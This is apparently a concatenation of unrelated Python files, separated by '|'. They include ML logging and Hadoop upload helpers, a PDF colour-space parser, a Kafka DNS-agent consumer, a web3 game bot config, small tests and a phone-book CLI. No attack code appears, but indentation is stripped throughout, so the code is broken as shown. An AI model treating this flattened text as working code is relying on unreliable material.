if type(d[k]) is dict:
new_d[k] = tree_map(f, d[k])
else:
new_d[k] = f(d[k])
return new_d
def tree_flatten(d):
new_d = {}
for k in d:
if type(d[k]) is dict:
cur_d = tree_flatten(d[k])
for sub_k, sub_v in cur_d.items():
new_d[f'{k}.{sub_k}'] = sub_v
else:
new_d[k] = d[k]
return new_d
def tree_filter(key_cond, value_cond, d):
new_d = {}
for k in d:
if not key_cond is None and not key_cond(k):
continue
if not value_cond is None and not value_cond(d[k]):
continue
if type(d[k]) is dict:
cur_d = tree_filter(key_cond, value_cond, d[k])
if len(cur_d) != 0:
new_d[k] = cur_d
else:
new_d[k] = d[k]
return new_d
def add_to_data_writer(data_writer, step, results, prefix=''):
"""tbd"""
print("step:%d %s:%s" % (step, prefix, str(results)))
if data_writer is None:
return
for k, v in results.items():
data_writer.add_scalar("%s/%s" % (prefix, k), v, step)
def upload_to_hadoop(args, cur_step):
def _upload_file(local_file, hadoop_dir):
assert len(hadoop_dir) > 10, \
f"hadoop_dir ({hadoop_dir}) is too short"
file_name = basename(local_file)
os.system(f"{hadoop_fs} -mkdir {hadoop_dir}")
os.system(f"{hadoop_fs} -rmr {hadoop_dir}/{file_name}")
os.system(f"{hadoop_fs} -put {local_file} {hadoop_dir}/{file_name}")
hadoop_fs = os.environ["HADOOP_FS"]
output_path = os.environ["OUTPUT_PATH"]
# upload models
_upload_file(
f'{args.model_dir}/step_{cur_step}.pdparams',
f'{output_path}/models')
# upload tensorboard log
files = os.listdir(f'{args.log_dir}/tensorboard_log_dir')
for file in files:
_upload_file(
f'{args.log_dir}/tensorboard_log_dir/{file}',
f'{output_path}/log/tensorboard_log_dir')
def csv_print(d):
keys = sorted(list(d.keys()))
values = [str(d[k]) for k in keys]
print(' '.join([str(x) for x in keys]))
print(' '.join([str(x) for x in values])) |
from dopy.manager import DoError
class DoMissingVariableError(DoError):
def __init__(self, message=None):
self.message = message
if message is None:
self.message = "Missing Required Variable"
super(DoMissingVariableError, self).__init__(self.message)
class DoEnvironmentError(DoError):
def __init__(self, message=None):
self.message = message
if message is None:
self.message = "Could not find values for DigitalOcean environment. \
Required for v2: DO_API_TOKEN. Required for v1: DO_CLIENT_ID, DO_API_KEY"
super(DoEnvironmentError, self).__init__(self.message)
|
from abc import abstractmethod, ABC
from gym_cooking.cooking_world.constants import *
class Object(ABC):
def __init__(self, location, movable, walkable):
self.location = location
self.movable = movable # you can pick this one up
self.walkable = walkable # you can walk on it
def name(self) -> str:
return type(self).__name__
def move_to(self, new_location):
self.location = new_location
@abstractmethod
def file_name(self) -> str:
pass
class ActionObject(ABC):
@abstractmethod
def action(self, objects):
pass
class ProgressingObject(ABC):
@abstractmethod
def progress(self, dynamic_objects):
pass
class StaticObject(Object):
def __init__(self, location, walkable):
super().__init__(location, False, walkable)
def move_to(self, new_location):
raise Exception(f"Can't move static object {self.name()}")
@abstractmethod
def accepts(self, dynamic_objects) -> bool:
pass
class DynamicObject(Object, ABC):
def __init__(self, location):
super().__init__(location, True, False)
class Container(DynamicObject, ABC):
def __init__(self, location, content=None):
super().__init__(location)
self.content = content or []
def move_to(self, new_location):
for content in self.content:
content.move_to(new_location)
self.location = new_location
def add_content(self, content):
self.content.append(content)
class Food:
@abstractmethod
def done(self):
pass
class ChopFood(DynamicObject, Food, ABC):
def __init__(self, location):
super().__init__(location)
self.chop_state = ChopFoodStates.FRESH
def chop(self):
if self.done():
return False
self.chop_state = ChopFoodStates.CHOPPED
return True
class BlenderFood(DynamicObject, Food, ABC):
def __init__(self, location):
super().__init__(location)
self.current_progress = 10
self.max_progress = 0
self.min_progress = 10
self.blend_state = BlenderFoodStates.FRESH
def blend(self):
if self.done():
return False
if self.blend_state == BlenderFoodStates.FRESH or self.blend_state == BlenderFoodStates.IN_PROGRESS:
self.current_progress -= 1
self.blend_state = BlenderFoodStates.IN_PROGRESS if self.current_progress > self.max_progress \
else BlenderFoodStates.MASHED
return True
ABSTRACT_GAME_CLASSES = (ActionObject, ProgressingObject, Container, Food, ChopFood, DynamicObject, StaticObject,
BlenderFood)
STATEFUL_GAME_CLASSES = (ChopFood, BlenderFood)
|
""" Config flow for APC Home """
|
from pdfminer.psparser import LIT, PSLiteral, PSStackParser, PSKeyword, PSEOF, keyword_name
from pdfminer.pdftypes import PDFObjRef, resolve1, dict_value, stream_value, list_value, PDFStream
from PIL import ImageCms
from io import BytesIO
import numpy as np
from itertools import product
class colorSpaces:
@property
def defaults(self):
default_values = [
(GrayColorSpace, LIT('DeviceGray'), LIT('G')),
(RGBColorSpace, LIT('DeviceRGB'), LIT('RGB')),
(CMYKColorSpace, LIT('DeviceCMYK'), LIT('CMYK')),
(CalGrayColorSpace, LIT('CalGray')),
(CalRGBColorSpace, LIT('CalRGB')),
(LabColorSpace, LIT('Lab')),
(ICCBasedColorSpace, LIT('ICCBased')),
(IndexedColorSpace, LIT('Indexed')),
(SeparationColorSpace, LIT('Separation')),
# (DeviceNColorSpace, LIT('DeviceN')),
(PatternColorSpace, LIT('Pattern')),
(NColorSpace, LIT('DeviceN')),
]
refs = {}
for tpl in default_values:
for i, x in enumerate(tpl):
if i > 0:
refs[x] = tpl[0]
return refs
def parse(self, obj, args=[]):
if isinstance(obj, PDFObjRef):
obj = resolve1(obj)
if isinstance(obj, PSLiteral):
cs = self.defaults.get(obj)
if not cs:
return None
# raise TypeError('unknown color space: %s' % obj.name)
return cs(*args)
if isinstance(obj, list):
return self.parse(obj[0], args=obj[1:])
class ColorSpace:
overprintMask = 0x0f
pipe = lambda *val: val
getGray = pipe
getRGB = pipe
getCMYK = pipe
mapGray = pipe
mapRGB = pipe
mapCMYK = pipe
class GrayColorSpace(ColorSpace):
mode = 'L'
ncomps = 1
def getRGB(self, gray):
# [gray] · [1, 1, 1]
r = g = b = gray
return r, g, b
def getCMYK(self, gray):
# [gray] · [0, 0, 0, 1]
c = m = y = 0
k = gray
return c, m, y, k
class CalGrayColorSpace(GrayColorSpace):
whiteX = whiteY = whiteZ = 1
blackX = blackY = blackZ = 0
gamma = 1
def __init__(self, obj):
obj = resolve1(obj)
params = dict_value(obj)
self.whiteX, self.whiteY, self.whiteZ = params['WhitePoint']
self.blackX, self.blackY, self.blackZ = params['BlackPoint']
self.gamma = params['Gamma']
class RGBColorSpace(ColorSpace):
mode = 'RGB'
ncomps = 3
def getGray(self, r, g, b):
return 0.299 * r + 0.587 * g + 0.114 * b
def getCMYK(self, r, g, b):
c = 1 - r
m = 1 - g
y = 1 - b
k = min(c, m, y)
return c - k, m - k, y - k, k
def mapGray(self, arr):
return self.getGray(arr[..., 0], arr[..., 1], arr[..., 2])
def mapCMYK(self, arr):
k = arr.max(-1)
out = np.empty_like(arr)
out[..., 0] = k - arr[..., 0]
out[..., 1] = k - arr[..., 1]
out[..., 2] = k - arr[..., 2]
k = k[..., np.newaxis]
return np.concatenate((out, 255 - k), axis=-1)
class CalRGBColorSpace(RGBColorSpace):
matrix = [
1, 0, 0,
0, 1, 0,
0, 0, 1
]
def __init__(self, obj):
obj = resolve1(obj)
params = dict_value(obj)
self.whiteX, self.whiteY, self.whiteZ = params.get(
'WhitePoint', (1, 1, 1))
self.blackX, self.blackY, self.blackZ = params.get(
'BlackPoint', (0, 0, 0))
self.gammaR, self.gammaG, self.gammaB = params.get('Gamma', (1, 1, 1))
self.matrix = params.get('Matrix', self.matrix)
class CMYKColorSpace(ColorSpace):
mode = 'CMYK'
ncomps = 4
factors = [
[1, 1, 1],
[0.1373, 0.1216, 0.1255],
[1, 0.9490, 0],
[0.1098, 0.1020, 0],
[0.9255, 0, 0.5490],
[0.1412, 0, 0],
[0.9294, 0.1098, 0.1412],
[0.1333, 0, 0],
[0, 0.6784, 0.9373],
[0, 0.0588, 0.1412],
[0, 0.6510, 0.3137],
[0, 0.0745, 0],
[0.1804, 0.1922, 0.5725],
[0, 0, 0.0078],
[0.2118, 0.2119, 0.2235],
[0, 0, 0]
]
def getGray(self, c, m, y, k):
return 1 - k - 0.3 * c - 0.59 * m - 0.11 * y
def getRGB(self, c, m, y, k, r=0, g=0, b=0):
c1, m1, y1, k1 = 1-c, 1-m, 1-y, 1-k
for i, (b0, b1, b2, b3) in enumerate(product([c1, c], [m1, m], [y1, y], [k1, k])):
x = b0 * b1 * b2 * b3
r += self.factors[i][0] * x
g += self.factors[i][1] * x
b += self.factors[i][2] * x
return r, g, b
def mapGray(self, arr):
return 255 - arr[..., 3] - 0.3 * arr[..., 0] - 0.59 * arr[..., 1] - 0.11 * arr[..., 2]
def mapRGB(self, arr):
arr = arr.astype('float') / 255
out = np.empty_like(arr[..., :-1], dtype='float')
self.getRGB(*(arr[..., i] for i in range(4)),
*(out[..., i] for i in range(3)))
return (out * 255).astype('uint8')
xyzrgb = [
[3.240449, -1.537136, -0.498531],
[-0.969265, 1.876011, 0.041556],
[0.055643, -0.204026, 1.057229]
]
class LabColorSpace(ColorSpace):
mode = 'LAB'
ncomps = 3
def __init__(self, obj):
obj = resolve1(obj)
params = dict_value(obj)
self.whiteX, self.whiteY, self.whiteZ = params.get(
'WhitePoint', (1, 1, 1))
self.blackX, self.blackY, self.blackZ = params.get(
'BlackPoint', (0, 0, 0))
self.aMin, self.bMin, self.aMax, self.bMax = params.get(
'Range', (-100, -100, 100, 100))
self.kr = 1 / (
xyzrgb[0][0] * self.whiteX +
xyzrgb[0][1] * self.whiteY +
xyzrgb[0][2] * self.whiteZ
)
self.kg = 1 / (
xyzrgb[1][0] * self.whiteX +
xyzrgb[1][1] * self.whiteY +
xyzrgb[1][2] * self.whiteZ
)
self.kb = 1 / (
xyzrgb[2][0] * self.whiteX +
xyzrgb[2][1] * self.whiteY +
xyzrgb[2][2] * self.whiteZ
)
def getGray(self, l, a, b):
r, g, b = self.getRGB(l, a, b)
return 0.299 * r + 0.587 * g + 0.114 * b + 0.5
def getRGB(self, l, a, b):
def lab2xyz(t): return t ** 3 if (t >= 6 /
29) else (108 / 841 * (t - 4 / 29))
# convert L*a*b* to CIE 1931 XYZ color space
t1 = (l + 16) / 116
t2 = t1 + a / 500
X = lab2xyz(t2)
X *= self.whiteX
Y = lab2xyz(t1)
Y *= self.whiteY
t2 = t1 - b / 200
Z = lab2xyz(t2)
Z *= self.whiteZ
# convert XYZ to RGB, including gamut mapping and gamma correction
r = xyzrgb[0][0] * X + xyzrgb[0][1] * Y + xyzrgb[0][2] * Z
g = xyzrgb[1][0] * X + xyzrgb[1][1] * Y + xyzrgb[1][2] * Z
b = xyzrgb[2][0] * X + xyzrgb[2][1] * Y + xyzrgb[2][2] * Z
return r ** 0.5, g ** 0.5, b ** 0.5
def getCMYK(self, l, a, b):
r, g, b = self.getRGB(l, a, b)
c = 1 - r
m = 1 - g
y = 1 - b
k = min(c, m, y)
return c - k, m - k, y - k, k
class ICCBasedColorSpace(ColorSpace):
@property
def defaults(self):
return {
'L': GrayColorSpace,
'RGB': RGBColorSpace,
'CMYK': CMYKColorSpace,
'LAB': LabColorSpace
}
mode = 'RGB'
def __init__(self, obj):
obj = resolve1(obj)
fp = BytesIO(obj.get_data())
self.profile = ImageCms.ImageCmsProfile(fp)
fp.close()
self.mode = self.profile.profile.color_space
if self.mode == 'LAB':
alt = resolve1(obj['Alternate'])
if isinstance(alt, list):
alt = alt[1]
self.base = self.defaults[self.mode](alt)
else:
self.base = self.defaults[self.mode]()
self.ncomps = len(self.mode)
def getGray(self, *val):
return self.base.getGray(*val)
def getRGB(self, *val):
return self.base.getRGB(*val)
def getCMYK(self, *val):
return self.base.getCMYK(*val)
class IndexedColorSpace(ColorSpace):
mode = 'P'
basemode = 'RGB'
palette = list(map(lambda i: (i, i, i), range(256)))
ncomps = 1
def __init__(self, base, hival, obj):
cs = colorSpaces()
self.base = cs.parse(resolve1(base))
self.hival = int(resolve1(hival))
obj = resolve1(obj)
data = b''
if isinstance(obj, bytes):
data = obj
elif isinstance(obj, PDFStream):
data = obj.get_data()
if data:
n = self.base.ncomps
self.palette = [[data[i * n + j] for j in range(n)] for i in range(len(data) // n)]
def lookup(self, index):
i = max(0, min(index, len(self.palette) - 1))
return self.palette[i]
def getGray(self, index):
return self.base.getGray(*self.lookup(index))
def getRGB(self, index):
return self.base.getRGB(*self.lookup(index))
def getCMYK(self, index):
return self.base.getCMYK(*self.lookup(index))
def mapPixels(self, arr):
palette = np.array(self.palette, dtype='uint8')
return palette[arr]
def mapGray(self, arr):
return self.base.mapGray(arr)
def mapRGB(self, arr):
return self.base.mapRGB(arr)
def mapCMYK(self, arr):
return self.base.mapCMYK(arr)
class functionParser:
def _min(self, x, num):
if isinstance(x, (int, float)):
return min(x, num)
x[x >= num] = num
return x
def _max(self, x, num):
if isinstance(x, (int, float)):
return max(x, num)
x[x < num] = num
return x
class SampledFunctionParser(functionParser):
def __init__(self, spec, domain):
self.domain = domain
self.frange = list_value(spec['Range'])
self.nins = len(self.domain) >> 1
self.nouts = len(self.frange) >> 1
self.sizes = list_value(spec['Size'])[:self.nins]
self.bits = int(spec['BitsPerSample'])
if 'Encode' in spec:
self.encode = list_value(spec['Encode'])
else:
self.encode = [0] * (self.nins << 1)
self.encode[1::2] = [size-1 for size in self.sizes]
self.decode = list_value(
spec['Decode']) if 'Decode' in spec else self.frange[:]
# domain = [0 1]
# range = [0 1 0 1 0 1 0 1]
# bits = 8
# sizes = [1024]
# encode = [0 1023]
# decode = [0 1 0 1 0 1 0 1]
def interpolate(self, x, xmin, xmax, ymin, ymax):
return (ymax - ymin) / (xmax-xmin) * (x-xmin) + ymin
def parse(self, *args):
e = []
for i in range(self.nins):
x = self._min(
self._max(args[i], self.domain[i*2]), self.domain[i*2+1])
x = self.interpolate(
x, self.domain[i*2], self.domain[i*2+1], self.encode[i*2], self.encode[i*2+1])
e.append(self._min(self._max(x, 0), self.sizes[i]-1))
return e
def SampledFunction(spec, domain):
parser = SampledFunctionParser(spec, domain)
return parser.parse
class ExponentialFunctionParser(functionParser):
def __init__(self, spec, domain):
self.c0, self.c1 = [0], [1]
if spec.get('C0'):
self.c0 = [float(x) for x in list_value(spec['C0'])]
if spec.get('C1'):
self.c1 = [float(x) for x in list_value(spec['C1'])]
self.n = spec['N']
self.frange = None
if spec.get('Range'):
self.frange = list_value(spec.get('Range'))
self.domain = domain
def parse(self, ipt):
ipt /= 255
ipt = self._min(self._max(ipt, self.domain[0]), self.domain[1])
opt = []
for i in range(len(self.c0)):
x = self.c0[i] + pow(ipt, self.n) * (self.c1[i] - self.c0[i])
if self.frange:
x = self._min(self._max(x, self.frange[0]), self.frange[1])
opt.append(x * 255)
return opt
def ExponentialFunction(spec, domain):
parser = ExponentialFunctionParser(spec, domain)
return parser.parse
def StitchingFunction(spec, domain):
pass
class PSFunctionParser(PSStackParser):
def __init__(self, fp):
super().__init__(fp)
self.run()
def run(self):
try:
self.nextobject()
except PSEOF:
pass
_, self.argstack = self.curstack.pop()
self.reset()
def parse(self, *args):
argstack = list(args) + self.argstack
self.curstack = []
while argstack:
obj = argstack.pop(0)
if isinstance(obj, PSKeyword):
name = keyword_name(obj)
if not isinstance(name, str):
name = name.decode()
result = getattr(self, 'do_'+name)()
if result is not None:
if isinstance(result, (list, tuple)):
self.curstack += list(result)
else:
self.curstack.append(result)
else:
self.curstack.append(obj)
return self.curstack
def do_keyword(self, pos, token):
self.push((pos, token))
def do_roll(self):
n, j = self.pop(2)
vals = self.pop(n)
j %= n
if not j:
return vals
return (vals*2)[n-j:n*2-j]
def do_dup(self):
x = self.pop(1)
return x + x
def do_exch(self):
a, b = self.pop(2)
return b, a
def do_sub(self):
a, b = self.pop(2)
if isinstance(b, (int, float)):
return b - a
b[b < a] = 0
b[b >= a] -= a
return b
def do_pop(self):
self.pop(1)
def do_index(self):
i = self.pop(1)[0]
return self.curstack[-i-1]
def do_cvr(self):
num = self.pop(1)[0]
return float(num)
def do_mul(self):
a, b = self.pop(2)
return a * b
def PostScriptFunction(spec, domain):
parser = PSFunctionParser(BytesIO(spec.get_data()))
return parser.parse
def func_parse(spec):
func_type = int(spec.get('FunctionType'))
domain = list_value(spec.get('Domain'))
func_refs = {
0: SampledFunction,
2: ExponentialFunction,
3: StitchingFunction,
4: PostScriptFunction
}
func_builder = func_refs[func_type]
return func_builder(spec, domain)
class SeparationColorSpace(ColorSpace):
mode = 'P'
def __init__(self, alt, base, func, *args):
cs = colorSpaces()
self.base = cs.parse(resolve1(base))
spec = resolve1(func)
self.ncomps = len(spec['Domain']) >> 1
self.func = func_parse(spec)
def transform(self, *val):
transformed = self.func(*val)
new_val = []
for i in range(self.base.ncomps):
new_val.append(transformed[i])
return new_val
def mapPixels(self, arr):
if not self.func:
return arr
if len(arr.shape) == 2:
arr = arr[..., np.newaxis]
w, h, d = arr.shape
arr = arr.astype('float')
transformed = self.transform(*[arr[..., i] for i in range(d)])
result = None
for layer in transformed:
if isinstance(layer, (int, float)):
layer = np.ones((w, h), dtype='float') * layer
layer = layer.astype('uint8')
if result is None:
result = layer
else:
result = np.dstack([result, layer])
return result
def getGray(self, *val):
val = self.transform(*val)
return self.base.getGray(*val)
def getRGB(self, *val):
val = self.transform(*val)
return self.base.getRGB(*val)
def getCMYK(self, *val):
val = self.transform(*val)
return self.base.getCMYK(*val)
def mapGray(self, arr):
return self.base.mapGray(arr)
def mapRGB(self, arr):
return self.base.mapRGB(arr)
def mapCMYK(self, arr):
return self.base.mapCMYK(arr)
class NColorSpace(SeparationColorSpace):
mode = 'P'
def __init__(self, names, alt, func, *attrs):
self.names = list_value(names)
self.base = colorSpaces().parse(resolve1(alt))
spec = resolve1(func)
self.ncomps = len(spec['Domain']) >> 1
self.func = func_parse(spec)
class PatternColorSpace(ColorSpace):
under = None
mode = 'P'
ncomps = 1
def __init__(self, *args):
if args:
cs = colorSpaces()
self.under = cs.parse(resolve1(args[0]))
defaults = colorSpaces().defaults
parse = colorSpaces().parse
|
import json
import logging
import os
import sys
from confluent_kafka import Consumer, KafkaException
from dnsagent import agent
logger = logging.getLogger(__name__)
def consume():
brokers = os.environ.get("RESTKNOT_KAFKA_BROKERS")
topic = os.environ.get("RESTKNOT_KAFKA_TOPIC")
group_id = os.environ.get("RESTKNOT_KAFKA_GROUP_ID")
agent_type = os.environ.get("RESTKNOT_AGENT_TYPE")
conf = {
"bootstrap.servers": brokers,
"group.id": group_id,
"auto.offset.reset": "earliest",
"enable.auto.commit": True,
}
def print_assignment(consumer, partitions):
logger.info(f"Consumer assigned to: {partitions}")
consumer = Consumer(conf)
consumer.subscribe([topic], on_assign=print_assignment)
try:
while True:
message = consumer.poll(timeout=1.0)
if message is None:
continue
if message.error():
raise KafkaException(message.error())
message = message.value()
message = json.loads(message.decode("utf-8"))
agent_type_msg = message["agent"]["agent_type"]
if agent_type in agent_type_msg:
knot_queries = message["knot"]
for query in knot_queries:
agent.execute(query)
except KeyboardInterrupt:
print(" dnsagent stopped. Aborted by user")
finally:
# Close down consumer to commit final offsets.
consumer.close()
def configure_logger():
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_format = logging.Formatter(
"[%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s"
)
stdout_handler.setFormatter(stdout_format)
stdout_handler.setLevel(logging.INFO)
root = logging.getLogger()
root.addHandler(stdout_handler)
root.setLevel(logging.DEBUG)
def main():
configure_logger()
consume()
if __name__ == "__main__":
main()
|
import argparse
import subprocess
import wandb
from config import PROJECT, BUCKET
# Initial condition timesteps to gather for training data
train_timestamps = ["1", "3", "4", "5", "7", "8", "10", "11", "12"]
# Initial condition timesteps to gather for testing data
valid_timestamps = ["2", "6", "9"]
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=(
"This script gathers netcdfs from a set of training runs"
" and uploads them to train/test groups on GCS. Runs are"
" assumed to be in "
"gs://<BUCKET>/<PROJECT>/<RUN_DATE>/<TAG>/artifacts/<TIMESTAMP>/netcdf_output" # noqa E501
" format to be gathered. The <RUN_DATE> is the date the job"
" was performed and <TAG> the unique project name."
)
)
parser.add_argument(
"run_date", help="date string when training was run, e.g., 2021-11-18"
)
parser.add_argument("tag_prefix", help="Common tag prefix for training data runs")
args = parser.parse_args()
run = wandb.init(
job_type="netcdf-gather", project="microphysics-emulation", entity="ai2cm"
)
wandb.config.update(args)
base_url = f"gs://{BUCKET}/{PROJECT}/{args.run_date}"
train_out = f"{base_url}/{args.tag_prefix}-training_netcdfs/train"
valid_out = f"{base_url}/{args.tag_prefix}-training_netcdfs/test"
command = ["gsutil", "-m", "cp"]
for timestamp in train_timestamps:
tag = f"{args.tag_prefix}-{timestamp}"
nc_src = f"{base_url}/{tag}/artifacts/*/netcdf_output/*.nc"
dir_args = [nc_src, train_out]
subprocess.check_call(command + dir_args)
for timestamp in valid_timestamps:
tag = f"{args.tag_prefix}-{timestamp}"
nc_src = f"{base_url}/{tag}/artifacts/*/netcdf_output/*.nc"
dir_args = [nc_src, valid_out]
subprocess.check_call(command + dir_args)
artifact = wandb.Artifact("microphysics-training-data", type="training_netcdfs")
artifact.add_reference(f"{base_url}/training_netcdfs")
wandb.log_artifact(artifact)
|
import time
from get_model_and_data import get_model_and_data
from probflow.callbacks import TimeOut
def test_TimeOut():
# Get a model and data
my_model, x, y = get_model_and_data()
# Test TimeOut
to = TimeOut(2)
ts = time.time()
my_model.fit(x, y, batch_size=5, epochs=10000, callbacks=[to])
assert time.time() - ts < 4
|
import re
def get_text(string):
"""
normalizing white space and stripping HTML markups.
"""
text = re.sub('\s+',' ',string)
text = re.sub(r'<.*?>',' ',text)
return text
print get_text("<pre>Hi,<br><br>Unless IEm mistaken, this bill has not been paida Do I know if there is a problem or if itEs just an oversight ?<br><br>If itEs an oversight, thank you to make the emergency ") |
import typing
from web3 import Web3
from src.common.types import ConfigTeam, ConfigUser, Tus, TeamTask, LootStrategyName, ReinforceStrategyName
from .dotenv import getenv
import os
from typing import List, cast
from src.common.exceptions import InvalidConfig, MissingConfig
from eth_typing import Address
#################
# Parse
#################
# Project directory
rootDir: str = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
# Teams
teams: List[ConfigTeam] = [
{
'id': int(getenv('USER_1_TEAM_1')),
'userAddress': cast(Address, getenv('USER_1_ADDRESS')),
'battlePoints': int(getenv('USER_1_TEAM_1_BATTLE_POINTS')),
'task': cast(TeamTask, getenv('USER_1_TEAM_1_TASK', 'mine')), # not implemented yet
'lootStrategyName': cast(LootStrategyName, getenv('USER_1_TEAM_1_LOOT_STRATEGY', 'LowestBp')),
'reinforceStrategyName': cast(ReinforceStrategyName, getenv('USER_1_TEAM_1_REINFORCE_STRATEGY', 'HighestBp')),
},
]
# Users
users: List[ConfigUser] = [
{
'name': getenv('USER_1_NAME'),
'address': cast(Address, getenv('USER_1_ADDRESS')),
'privateKey': getenv('USER_1_PRIVATE_KEY'),
'maxPriceToReinforceInTus': cast(Tus, int(getenv('USER_1_MAX_PRICE_TO_REINFORCE')) or 0), # in TUS
'maxPriceToReinforceInTusWei': Web3.toWei(int(getenv('USER_1_MAX_PRICE_TO_REINFORCE') or 0), 'ether'), # in TUS wei
'teams': [ t for t in teams if t['userAddress'] == cast(Address, getenv('USER_1_ADDRESS')) ]
},
]
# RPC
nodeUri = getenv('WEB3_NODE_URI')
# Gas
defaultGas = getenv('DEFAULT_GAS', '200000') # units
defaultGasPrice = getenv('DEFAULT_GAS_PRICE', '25') # gwei
# Twilio
twilio = {
"accountSid": getenv('TWILIO_ACCOUNT_SID'),
"authToken": getenv('TWILIO_AUTH_TOKEN'),
}
# Notifications
notifications = {
"sms": {
"enable": True if "1" == str(getenv('NOTIFICATION_SMS', '0')) else False,
"from": getenv('NOTIFICATION_SMS_FROM'),
"to": getenv('NOTIFICATION_SMS_TO'),
}
}
#################
# Validate
#################
# Validate teams
for team in teams:
if team['task'] not in typing.get_args(TeamTask):
raise InvalidConfig(f"task of team {team['id']} must be one of {str(typing.get_args(TeamTask))}, is '{team['task']}'")
if team['lootStrategyName'] not in typing.get_args(LootStrategyName):
raise InvalidConfig(f"lootStrategy of team {team['id']} must be one of {str(typing.get_args(LootStrategyName))}, is '{team['lootStrategyName']}'")
if team['reinforceStrategyName'] not in typing.get_args(ReinforceStrategyName):
raise InvalidConfig(f"reinforceStrategy of team {team['id']} must be one of {str(typing.get_args(ReinforceStrategyName))}, is '{team['reinforceStrategyName']}'")
# Validate users
for user in users:
if not user['address']:
raise MissingConfig("User has no ADDRESS")
maxPrice = user.get('maxPriceToReinforceInTus')
if not maxPrice or maxPrice <= 0:
raise MissingConfig("User has no or invalid MAX_PRICE_TO_REINFORCE (must be a value greater than zero)")
|
from django.http import HttpResponse
def index(request):
return HttpResponse("Welcome page, project works!")
|
import os
import sys
def test_wrong_merge():
p = os.popen("grep -rnw ./djcourses -e \'<<<<<<< HEAD\'").read()
if p:
print(p)
sys.exit(1)
sys.exit(0)
if __name__ == "__main__":
test_wrong_merge() |
import unittest
import cmdtools
class TestProcess(unittest.TestCase):
def test_process(self):
cmd = "/sum 10 10 10"
cmd = cmdtools.Cmd(cmd, convert_args=True)
res = cmd.process_cmd(TestProcess.sum)
self.assertEqual(res, 30, "boo")
def test_match(self):
cmd = '/sell "Gold" 50'
cmd = cmdtools.Cmd(cmd, convert_args=True)
match = cmd.match_args("si")
self.assertTrue(match, "boo")
def test_match_(self):
cmd = "/add 10 40 20 59"
cmd = cmdtools.Cmd(cmd, convert_args=True)
match = cmd.match_args(("i" * len(cmd.args)))
self.assertTrue(match, "boo")
def test_default(self):
cmd = "/get"
cmd = cmdtools.Cmd(cmd)
res = cmd.process_cmd(TestProcess.get)
self.assertEqual("Hello World", res)
def get(text="Hello World"):
return text
def sum(*args):
return sum(args)
|
# File IO - Append
# File
my_file = "my_phone_book.txt"
# Add
def add_entry(first_name, last_name, phone_number):
entry = first_name + "," + last_name + "," + phone_number + "\n"
with open(my_file, "a") as file_handler:
file_handler.write(entry)
# Get list
def get_list_from_file(file_name):
phone_book_list = []
with open(file_name, "r") as file_handler:
for line in file_handler:
phone_book_list.append(line.replace("\n", ""))
return phone_book_list
# Write list to phone book file
def write_list_to_file(phone_book_list, file_name):
phone_book_string = ""
for entry in phone_book_list:
phone_book_string += entry + "\n"
with open(file_name, "w") as file_handler:
file_handler.write(phone_book_string)
# Remove
def remove_entry(first_name, last_name):
phone_book_list = []
entry = first_name + "," + last_name
with open(my_file, "r") as file_handler:
for line in file_handler:
if entry not in line:
phone_book_list.append(line.replace("\n", ""))
write_list_to_file(phone_book_list, my_file)
# Look up
def look_up_name(first_name, last_name):
entry = first_name + "," + last_name
with open(my_file, "r") as file_handler:
for line in file_handler:
if entry in line:
print("*" * 30)
print("Found : ", line.replace("\n", ""))
print("*" * 30)
else:
print("*" * 30)
print("Not Found")
print("*" * 30)
# Update
def update_name():
with open(my_file, "r") as file_handler:
for line in file_handler:
print(line, end="")
# Update
def update_phone_number(first_name, last_name, new_phone_number):
phone_list = get_list_from_file(my_file)
entry_to_search = first_name + "," + last_name
remove_entry(first_name, last_name)
add_entry(first_name, last_name, new_phone_number)
# Main
def main():
while True:
print("-" * 30)
print("Welcome To Phone_Book v1.0")
print("-" * 30)
print("Menu :")
print("1. Add")
print("2. Lookup")
print("3. Update Phone Number")
print("4. Delete")
print("5. Exit")
print()
choice = int(input("Enter your selection : "))
if choice == 1:
first_name = input("Enter First Name : ")
last_name = input("Enter Last Name : ")
phone_number = input("Enter Phone Number : ")
add_entry(first_name, last_name, phone_number)
if choice == 2:
first_name = input("Enter First Name : ")
last_name = input("Enter Last Name : ")
look_up_name(first_name, last_name)
if choice == 3:
first_name = input("Enter First Name : ")
last_name = input("Enter Last Name : ")
new_phone_number = input("Enter New Phone Number : ")
update_phone_number(first_name, last_name, new_phone_number)
if choice == 4:
first_name = input("Enter First Name : ")
last_name = input("Enter Last Name : ")
phone_number = input("Enter Phone Number : ")
remove_entry(first_name, last_name)
if choice == 5:
exit()
if __name__ == "__main__":
main()
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provide a dynamic view."""
from contextlib import contextmanager
from operator import attrgetter
from typing import Iterable, Optional, Tuple, Union
from pydantic import Field
from ..mixin.model_ref_mixin import ModelRefMixin
from ..model import Component, Container, Element, Person, Relationship, SoftwareSystem
from ..model.static_structure_element import StaticStructureElement
from .relationship_view import RelationshipView
from .sequence_number import SequenceNumber
from .view import View, ViewIO
__all__ = ("DynamicView", "DynamicViewIO")
class DynamicViewIO(ViewIO):
"""
Represent a dynamic view on a C4 model.
Attributes:
element: The software system or container that this view is focused on.
"""
element_id: Optional[str] = Field(default=None, alias="elementId")
class DynamicView(ModelRefMixin, View):
"""
Represent a dynamic view on a C4 model.
A dynamic diagram can be useful when you want to show how elements in a static
model collaborate at runtime to implement a user story, use case, feature, etc.
This dynamic diagram is based upon a UML communication diagram (previously known
as a "UML collaboration diagram"). It is similar to a UML sequence diagram
although it allows a free-form arrangement of diagram elements with numbered
interactions to indicate ordering.
Attributes:
element: The software system or container that this view is focused on.
"""
def __init__(
self,
*,
element: Optional[Union[Container, SoftwareSystem]] = None,
**kwargs,
) -> None:
"""Initialize a DynamicView.
Note that we explicitly don't pass the software_system to the superclass as we
don't want it to appear in the JSON output (DynamicView uses elementId
instead).
"""
if "software_system" in kwargs:
raise ValueError(
"Software system must be specified through the 'element' argument for "
"DynamicViews"
)
super().__init__(**kwargs)
self.element = element
self.element_id = self.element.id if self.element else None
